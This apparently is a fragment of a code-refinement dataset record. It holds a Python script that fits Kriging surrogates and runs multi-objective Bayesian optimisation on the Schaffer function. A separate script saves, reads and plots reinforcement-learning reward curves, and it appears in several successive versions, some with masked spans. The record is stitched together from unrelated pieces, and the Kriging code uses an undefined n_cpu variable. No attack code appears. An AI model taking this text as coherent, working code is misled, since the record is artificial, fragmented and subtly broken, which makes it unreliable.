"step-4": "import os\nos.environ['MKL_NUM_THREADS'] = '1'\nos.environ['OPENBLAS_NUM_THREADS'] = '1'\nos.environ['MKL_DEBUG_CPU_TYPE'] = '5'\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom copy import deepcopy\nfrom kadal.optim_tools.MOBO import MOBO\nfrom kadal.surrogate_models.kriging_model import Kriging\nfrom kadal.surrogate_models.supports.initinfo import initkriginfo\nfrom kadal.testcase.analyticalfcn.cases import evaluate\nfrom kadal.misc.sampling.samplingplan import sampling\n\n\ndef generate_kriging():\n nsample = 20\n nvar = 2\n nobj = 2\n lb = -1 * np.ones(shape=[nvar])\n ub = 1 * np.ones(shape=[nvar])\n sampoption = 'halton'\n samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',\n upbound=ub, lobound=lb)\n X = sample\n global y\n y = evaluate(X, 'schaffer')\n KrigInfo1 = initkriginfo()\n KrigInfo1['X'] = X\n KrigInfo1['y'] = y[:, 0].reshape(-1, 1)\n KrigInfo1['problem'] = 'schaffer'\n KrigInfo1['nrestart'] = 5\n KrigInfo1['ub'] = ub\n KrigInfo1['lb'] = lb\n KrigInfo1['optimizer'] = 'lbfgsb'\n KrigInfo2 = deepcopy(KrigInfo1)\n KrigInfo2['y'] = y[:, 1].reshape(-1, 1)\n krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj1.train(n_cpu=n_cpu)\n loocverr1, _ = krigobj1.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr1, '%')\n krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj2.train(n_cpu=n_cpu)\n loocverr2, _ = krigobj2.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr2, '%')\n return krigobj1, krigobj2\n\n\ndef runopt(krigobj1, krigobj2):\n moboInfo = dict()\n moboInfo['nup'] = 3\n moboInfo['nrestart'] = 10\n moboInfo['acquifunc'] = 'ehvi'\n moboInfo['acquifuncopt'] = 'lbfgsb'\n Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5\n )\n xupdate, yupdate, supdate, metricall = Optim.run(disp=True)\n return xupdate, yupdate, metricall\n\n\nif __name__ == 
'__main__':\n krigobj1, krigobj2 = generate_kriging()\n xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)\n print(metricall)\n plt.scatter(y[:, 0], y[:, 1])\n plt.scatter(yupdate[:, 0], yupdate[:, 1])\n plt.show()\n",
"step-5": "import os\n# Set a single thread per process for numpy with MKL/BLAS\nos.environ['MKL_NUM_THREADS'] = '1'\nos.environ['OPENBLAS_NUM_THREADS'] = '1'\nos.environ['MKL_DEBUG_CPU_TYPE'] = '5'\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom copy import deepcopy\n\nfrom kadal.optim_tools.MOBO import MOBO\nfrom kadal.surrogate_models.kriging_model import Kriging\nfrom kadal.surrogate_models.supports.initinfo import initkriginfo\nfrom kadal.testcase.analyticalfcn.cases import evaluate\nfrom kadal.misc.sampling.samplingplan import sampling\n\n\ndef generate_kriging():\n # Sampling\n nsample = 20\n nvar = 2\n nobj = 2\n lb = -1 * np.ones(shape=[nvar])\n ub = 1 * np.ones(shape=[nvar])\n sampoption = \"halton\"\n samplenorm, sample = sampling(sampoption, nvar, nsample, result=\"real\",\n upbound=ub, lobound=lb)\n X = sample\n # Evaluate sample\n global y\n y = evaluate(X, \"schaffer\")\n\n # Initialize KrigInfo\n KrigInfo1 = initkriginfo()\n # Set KrigInfo\n KrigInfo1[\"X\"] = X\n KrigInfo1[\"y\"] = y[:, 0].reshape(-1, 1)\n KrigInfo1[\"problem\"] = \"schaffer\"\n KrigInfo1[\"nrestart\"] = 5\n KrigInfo1[\"ub\"] = ub\n KrigInfo1[\"lb\"] = lb\n KrigInfo1[\"optimizer\"] = \"lbfgsb\"\n\n # Initialize KrigInfo\n KrigInfo2 = deepcopy(KrigInfo1)\n KrigInfo2['y'] = y[:, 1].reshape(-1, 1)\n\n # Run Kriging\n krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj1.train(n_cpu=n_cpu)\n loocverr1, _ = krigobj1.loocvcalc()\n print(\"LOOCV error of Kriging model: \", loocverr1, \"%\")\n\n krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj2.train(n_cpu=n_cpu)\n loocverr2, _ = krigobj2.loocvcalc()\n print(\"LOOCV error of Kriging model: \", loocverr2, \"%\")\n\n return krigobj1, krigobj2\n\n\ndef runopt(krigobj1, krigobj2):\n moboInfo = dict()\n moboInfo[\"nup\"] = 3\n moboInfo[\"nrestart\"] = 10\n moboInfo[\"acquifunc\"] = \"ehvi\"\n 
moboInfo[\"acquifuncopt\"] = \"lbfgsb\"\n\n Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5)\n xupdate, yupdate, supdate, metricall = Optim.run(disp=True)\n\n return xupdate, yupdate, metricall\n\n\nif __name__ == '__main__':\n krigobj1, krigobj2 = generate_kriging()\n xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)\n\n print(metricall)\n plt.scatter(y[:, 0], y[:, 1])\n plt.scatter(yupdate[:, 0], yupdate[:, 1])\n plt.show()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def save_cp_csvdata(reward, err, filename):
with open(filename, mode='w') as data_file:
data_writer = csv.writer(data_file, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
data_writer.writerow(['epoch', 'reward', 'error'])
for i in range(reward.shape[0]):
data_writer.writerow([i, reward[i], err[i]])
def read_cp_csvdata(epoch, filename):
reward = np.zeros(epoch)
err = np.zeros(epoch)
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
pass
else:
reward[line_count - 1] = row[1]
err[line_count - 1] = row[2]
line_count += 1
print(f'Processed {line_count} lines.')
return reward, err
def draw_plot(data, error, epoch=100, filename='tests.png'):
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_bar(x, y_map, filename='result.png'):
labels = list(y_map.keys())
plt.xlabel('episode')
plt.ylabel('reward')
plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])
for l in labels:
plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
<|reserved_special_token_0|>
def draw_plot3():
grid_map = {}
cp_map = {}
grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]
cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]
grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]
cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]
grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]
cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]
draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')
draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')
def draw_plot4():
sarsagrid_map = {}
sarsacp_map = {}
qgrid_map = {}
qcp_map = {}
sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'
)[0]
sarsagrid_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_grid_f_1.csv')[0]
sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,
'sarsa_cartpole_f_1.csv')[0]
sarsacp_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_cartpole_f_1.csv')[0]
qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'
)[0]
qgrid_map['softmax'] = read_cp_csvdata(100,
'softmax/qlearning_grid_f_1.csv')[0]
qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'
)[0]
qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]
draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')
draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')
draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')
draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_cp_csvdata(reward, err, filename):
with open(filename, mode='w') as data_file:
data_writer = csv.writer(data_file, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
data_writer.writerow(['epoch', 'reward', 'error'])
for i in range(reward.shape[0]):
data_writer.writerow([i, reward[i], err[i]])
def read_cp_csvdata(epoch, filename):
reward = np.zeros(epoch)
err = np.zeros(epoch)
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
pass
else:
reward[line_count - 1] = row[1]
err[line_count - 1] = row[2]
line_count += 1
print(f'Processed {line_count} lines.')
return reward, err
def draw_plot(data, error, epoch=100, filename='tests.png'):
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_bar(x, y_map, filename='result.png'):
labels = list(y_map.keys())
plt.xlabel('episode')
plt.ylabel('reward')
plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])
for l in labels:
plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_err(x, y_map, filename):
labels = list(y_map.keys())
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
for l in labels:
ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_plot1():
reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')
draw_plot(reward, err, filename='sarsa_grid.png')
reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')
draw_plot(reward, err, filename='sarsa_cartpole.png')
reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')
draw_plot(reward, err, filename='qlearning_grid.png')
reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')
draw_plot(reward, err, filename='qlearning_cartpole.png')
def draw_plot3():
grid_map = {}
cp_map = {}
grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]
cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]
grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]
cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]
grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]
cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]
draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')
draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')
def draw_plot4():
sarsagrid_map = {}
sarsacp_map = {}
qgrid_map = {}
qcp_map = {}
sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'
)[0]
sarsagrid_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_grid_f_1.csv')[0]
sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,
'sarsa_cartpole_f_1.csv')[0]
sarsacp_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_cartpole_f_1.csv')[0]
qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'
)[0]
qgrid_map['softmax'] = read_cp_csvdata(100,
'softmax/qlearning_grid_f_1.csv')[0]
qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'
)[0]
qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]
draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')
draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')
draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')
draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_cp_csvdata(reward, err, filename):
with open(filename, mode='w') as data_file:
data_writer = csv.writer(data_file, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
data_writer.writerow(['epoch', 'reward', 'error'])
for i in range(reward.shape[0]):
data_writer.writerow([i, reward[i], err[i]])
def read_cp_csvdata(epoch, filename):
reward = np.zeros(epoch)
err = np.zeros(epoch)
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
pass
else:
reward[line_count - 1] = row[1]
err[line_count - 1] = row[2]
line_count += 1
print(f'Processed {line_count} lines.')
return reward, err
def draw_plot(data, error, epoch=100, filename='tests.png'):
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_bar(x, y_map, filename='result.png'):
labels = list(y_map.keys())
plt.xlabel('episode')
plt.ylabel('reward')
plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])
for l in labels:
plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_err(x, y_map, filename):
labels = list(y_map.keys())
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
for l in labels:
ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_plot1():
reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')
draw_plot(reward, err, filename='sarsa_grid.png')
reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')
draw_plot(reward, err, filename='sarsa_cartpole.png')
reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')
draw_plot(reward, err, filename='qlearning_grid.png')
reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')
draw_plot(reward, err, filename='qlearning_cartpole.png')
def draw_plot3():
grid_map = {}
cp_map = {}
grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]
cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]
grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]
cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]
grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]
cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]
draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')
draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')
def draw_plot4():
sarsagrid_map = {}
sarsacp_map = {}
qgrid_map = {}
qcp_map = {}
sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'
)[0]
sarsagrid_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_grid_f_1.csv')[0]
sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,
'sarsa_cartpole_f_1.csv')[0]
sarsacp_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_cartpole_f_1.csv')[0]
qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'
)[0]
qgrid_map['softmax'] = read_cp_csvdata(100,
'softmax/qlearning_grid_f_1.csv')[0]
qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'
)[0]
qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]
draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')
draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')
draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')
draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')
def draw_plot5():
pass
<|reserved_special_token_1|>
import numpy as np
import matplotlib.pyplot as plt
import csv
def save_cp_csvdata(reward, err, filename):
with open(filename, mode='w') as data_file:
data_writer = csv.writer(data_file, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
data_writer.writerow(['epoch', 'reward', 'error'])
for i in range(reward.shape[0]):
data_writer.writerow([i, reward[i], err[i]])
def read_cp_csvdata(epoch, filename):
reward = np.zeros(epoch)
err = np.zeros(epoch)
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
pass
else:
reward[line_count - 1] = row[1]
err[line_count - 1] = row[2]
line_count += 1
print(f'Processed {line_count} lines.')
return reward, err
def draw_plot(data, error, epoch=100, filename='tests.png'):
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_bar(x, y_map, filename='result.png'):
labels = list(y_map.keys())
plt.xlabel('episode')
plt.ylabel('reward')
plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])
for l in labels:
plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_err(x, y_map, filename):
labels = list(y_map.keys())
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
for l in labels:
ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_plot1():
reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')
draw_plot(reward, err, filename='sarsa_grid.png')
reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')
draw_plot(reward, err, filename='sarsa_cartpole.png')
reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')
draw_plot(reward, err, filename='qlearning_grid.png')
reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')
draw_plot(reward, err, filename='qlearning_cartpole.png')
def draw_plot3():
grid_map = {}
cp_map = {}
grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]
cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]
grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]
cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]
grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]
cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]
draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')
draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')
def draw_plot4():
sarsagrid_map = {}
sarsacp_map = {}
qgrid_map = {}
qcp_map = {}
sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'
)[0]
sarsagrid_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_grid_f_1.csv')[0]
sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,
'sarsa_cartpole_f_1.csv')[0]
sarsacp_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_cartpole_f_1.csv')[0]
qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'
)[0]
qgrid_map['softmax'] = read_cp_csvdata(100,
'softmax/qlearning_grid_f_1.csv')[0]
qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'
)[0]
qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]
draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')
draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')
draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')
draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')
def draw_plot5():
pass
<|reserved_special_token_1|>
import numpy as np
import matplotlib.pyplot as plt
import csv
def save_cp_csvdata(reward, err, filename):
    """Write per-epoch reward/error arrays to a CSV file.

    Parameters
    ----------
    reward : np.ndarray
        1-D array of rewards, one entry per epoch.
    err : np.ndarray
        1-D array of error values, same length as ``reward``.
    filename : str
        Destination CSV path; an existing file is overwritten.
    """
    # newline='' is required by the csv module; without it the writer emits
    # blank lines between rows on Windows.
    with open(filename, mode='w', newline='') as data_file:
        data_writer = csv.writer(data_file, delimiter=',', quotechar='"',
                                 quoting=csv.QUOTE_MINIMAL)
        data_writer.writerow(['epoch', 'reward', 'error'])
        for i in range(reward.shape[0]):
            data_writer.writerow([i, reward[i], err[i]])
def read_cp_csvdata(epoch, filename):
    """Load the reward and error columns from a CSV written by save_cp_csvdata.

    Returns two length-``epoch`` arrays; data rows (after the header) fill
    them in order, and any tail entries beyond the file's rows stay zero.
    """
    reward = np.zeros(epoch)
    err = np.zeros(epoch)
    line_count = 0
    with open(filename) as csv_file:
        for line_count, row in enumerate(csv.reader(csv_file, delimiter=','),
                                         start=1):
            if line_count == 1:
                continue  # skip the header row
            reward[line_count - 2] = row[1]
            err[line_count - 2] = row[2]
    print(f'Processed {line_count} lines.')
    return reward, err
def draw_plot(data, error, epoch=100, filename='tests.png'):
    """Plot reward vs. episode with error bars and save the figure.

    `data` and `error` are length-`epoch` sequences; the figure is written
    to `filename` at dpi=200 and then shown interactively.
    """
    figure, axes = plt.subplots()
    plt.xlabel('episode')
    plt.ylabel('reward')
    episodes = np.array(range(epoch))
    axes.errorbar(episodes, data, yerr=error, fmt='o')
    plt.savefig(filename, dpi=200)
    plt.show()
def draw_multi_bar(x, y_map, filename='result.png'):
    """Plot one reward curve per label in `y_map` against episode index.

    Parameters
    ----------
    x : sequence
        Episode values; its length and its first/middle/last entries are
        used for tick placement.
    y_map : dict
        Maps a legend label to its per-episode reward series.
    filename : str
        Path the figure is saved to (dpi=200).
    """
    labels = list(y_map.keys())
    plt.xlabel('episode')
    plt.ylabel('reward')
    # The original hard-coded x.index(0), x.index(49), x.index(99), which
    # raises ValueError for any x not containing exactly those values.
    # Use first/middle/last positions instead; for the callers' x ==
    # range(100) this produces the same ticks ([0, 49, 99]).
    x = list(x)
    if x:
        tick_pos = sorted({0, (len(x) - 1) // 2, len(x) - 1})
        plt.xticks(tick_pos, [x[i] for i in tick_pos])
    for l in labels:
        plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)
    plt.legend(loc='lower right')
    plt.savefig(filename, dpi=200)
    plt.show()
def draw_multi_err(x, y_map, filename):
    """Plot one error-bar series per label in `y_map`.

    Parameters
    ----------
    x : int
        Number of episodes.  NOTE(review): unlike draw_multi_bar this is a
        count, not a sequence — confirm callers pass an int.
    y_map : dict
        Maps a legend label to a (values, errors) pair of length-x arrays.
    filename : str
        Path the figure is saved to (dpi=200).
    """
    labels = list(y_map.keys())
    fig, ax = plt.subplots()
    plt.xlabel('episode')
    plt.ylabel('reward')
    for l in labels:
        # label= was missing in the original, so plt.legend() had no
        # entries to display.
        ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1],
                    fmt='o', label=l)
    plt.legend(loc='lower right')
    plt.savefig(filename, dpi=200)
    plt.show()
def draw_plot1():
    """Render one error-bar reward plot per recorded experiment CSV."""
    runs = [
        ('sarsa_grid_f_1.csv', 'sarsa_grid.png'),
        ('sarsa_cartpole_f_1.csv', 'sarsa_cartpole.png'),
        ('qlearning_grid_f_1.csv', 'qlearning_grid.png'),
        ('qlearning_cartpole_f.csv', 'qlearning_cartpole.png'),
    ]
    for csv_name, png_name in runs:
        reward, err = read_cp_csvdata(100, csv_name)
        draw_plot(reward, err, filename=png_name)
def draw_plot3():
    """Compare sarsa / qlearning / CEM reward curves on grid and cartpole."""
    # Per algorithm: (grid-world csv, cartpole csv).
    sources = {
        'sarsa': ('sarsa_grid_f_1.csv', 'sarsa_cartpole_f_1.csv'),
        'qlearning': ('qlearning_grid_f_1.csv', 'qlearning_cartpole_f.csv'),
        'cem': ('ce_grid.csv', 'ce_cartpole.csv'),
    }
    grid_map = {}
    cp_map = {}
    for algo, (grid_file, cp_file) in sources.items():
        grid_map[algo] = read_cp_csvdata(100, grid_file)[0]
        cp_map[algo] = read_cp_csvdata(100, cp_file)[0]
    draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')
    draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')
def draw_plot4():
    """Compare epsilon-greedy vs. softmax exploration for sarsa/qlearning
    on grid-world and cartpole, one figure per (algorithm, environment).
    """
    # (epsilon-greedy csv, softmax csv, output png) per figure; the original
    # spelled this out four times with copy-pasted dict assignments.
    configs = [
        ('sarsa_grid_f_1.csv', 'softmax/sarsa_grid_f_1.csv',
         'sarsa_grid_se.png'),
        ('sarsa_cartpole_f_1.csv', 'softmax/sarsa_cartpole_f_1.csv',
         'sarsa_cp_se.png'),
        ('qlearning_grid_f_1.csv', 'softmax/qlearning_grid_f_1.csv',
         'q_grid_se.png'),
        ('qlearning_cartpole_f.csv', 'softmax/q_cartpole_f.csv',
         'q_cp_se.png'),
    ]
    for greedy_file, softmax_file, out_png in configs:
        curves = {
            'epsilon greedy': read_cp_csvdata(100, greedy_file)[0],
            'softmax': read_cp_csvdata(100, softmax_file)[0],
        }
        draw_multi_bar(range(100), curves, filename=out_png)
def draw_plot5():
pass
# draw_plot1()
|
flexible
|
{
"blob_id": "a91d2f32afdc20516e56036c352cc267c728e886",
"index": 3051,
"step-1": "<mask token>\n\n\ndef save_cp_csvdata(reward, err, filename):\n with open(filename, mode='w') as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow(['epoch', 'reward', 'error'])\n for i in range(reward.shape[0]):\n data_writer.writerow([i, reward[i], err[i]])\n\n\ndef read_cp_csvdata(epoch, filename):\n reward = np.zeros(epoch)\n err = np.zeros(epoch)\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n else:\n reward[line_count - 1] = row[1]\n err[line_count - 1] = row[2]\n line_count += 1\n print(f'Processed {line_count} lines.')\n return reward, err\n\n\ndef draw_plot(data, error, epoch=100, filename='tests.png'):\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_bar(x, y_map, filename='result.png'):\n labels = list(y_map.keys())\n plt.xlabel('episode')\n plt.ylabel('reward')\n plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])\n for l in labels:\n plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\n<mask token>\n\n\ndef draw_plot3():\n grid_map = {}\n cp_map = {}\n grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]\n cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]\n draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')\n draw_multi_bar(range(100), cp_map, 
filename='cartpole_comparision.png')\n\n\ndef draw_plot4():\n sarsagrid_map = {}\n sarsacp_map = {}\n qgrid_map = {}\n qcp_map = {}\n sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'\n )[0]\n sarsagrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_grid_f_1.csv')[0]\n sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,\n 'sarsa_cartpole_f_1.csv')[0]\n sarsacp_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_cartpole_f_1.csv')[0]\n qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'\n )[0]\n qgrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/qlearning_grid_f_1.csv')[0]\n qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'\n )[0]\n qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]\n draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')\n draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')\n draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')\n draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')\n\n\n<mask token>\n",
